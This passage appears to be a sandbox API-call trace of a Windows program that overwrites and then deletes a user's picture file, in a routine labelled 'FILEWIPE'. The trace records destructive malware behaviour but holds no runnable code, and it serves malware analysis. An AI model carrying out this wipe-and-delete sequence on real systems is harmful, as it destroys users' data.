lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.519] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0039.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.519] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.519] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0xae940c60, ftLastWriteTime.dwHighDateTime=0x1d5b820, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0x7c2240 [0039.520] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.520] CharLowerBuffW (in: lpsz="byte[68329]", cchLength=0xb | out: lpsz="byte[68329]") returned 0xb [0039.520] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.520] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.520] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.520] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.520] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.521] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.521] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.521] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hfkycn4w3tol.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0039.522] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.523] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.523] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.524] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.524] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.525] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.525] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFilePart=0x0) returned 0x37 [0039.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0x1744e0c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0x7c2240 [0039.525] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HFkYcn4W3ToL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hfkycn4w3tol.png")) returned 1 [0039.530] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd2a7c0, ftCreationTime.dwHighDateTime=0x1d5c30e, ftLastAccessTime.dwLowDateTime=0xae940c60, ftLastAccessTime.dwHighDateTime=0x1d5b820, ftLastWriteTime.dwLowDateTime=0x1744e0c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10ae9, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="HFkYcn4W3ToL.png", cAlternateFileName="HFKYCN~1.PNG")) returned 0 [0039.530] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.530] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.531] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 